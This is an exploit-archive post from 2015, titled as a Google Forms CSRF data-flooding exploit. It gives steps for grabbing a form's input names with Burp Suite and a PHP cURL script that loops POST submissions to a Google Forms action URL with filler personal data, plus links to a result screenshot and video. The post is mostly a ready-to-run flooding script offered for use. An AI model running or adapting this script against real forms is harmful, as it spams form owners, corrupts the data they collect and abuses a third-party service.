# Exploit Title: csrf google forms data flooding # Date: 29-6-2015 # Exploit Author: alqnas eslam # Vendor Homepage:fb.com/alqnas4 # Software Link: https://docs.google.com # Tested on:windows or linux ======================================================== description: google not set token in the forms so attacker can send data flooding in forms ======================================================== Setps: 1- open any form in google forms 2- get inputs name and action you can use (burp suite) 3- edit my code php and put in it inputs name and action and number you want send data 4- run code in any server ========================================================== poc: <?php $i =1; function post_to_url($url, $data) { $fields = ''; foreach($data as $key => $value) { $fields .= $key . '=' . $value . '&'; } rtrim($fields, '&'); ini_set('max_execution_time', 50000); $post = curl_init(); curl_setopt($post, CURLOPT_URL, $url); curl_setopt($post, CURLOPT_POST, count($data)); curl_setopt($post, CURLOPT_POSTFIELDS, $fields); curl_setopt($post, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($post); } //number of data will be send 10 while ( $i <=10 ){ $data = array( // inputs name //inputs value "entry.1749181457" => "test alqnas eslam", "entry.1360610555" => "01119032582", "entry.660237368" => "info test", "entry.319716724" => "alqnast@yahoo.com", "entry.1363501645" => "19", "draftResponse" =>"", "pageHistory" =>"0", "fbzx"=> "-2167671423753092324" ); //action of form post_to_url("https://docs.google.com/forms/action", $data); $i++; } ?> ====================================================================== the result after you run code http://cdn.top4top.net/i_128f910c611.jpg ====================================================================== explane poc video in youtube http://youtu.be/kHJi_8UNjxw ==============================================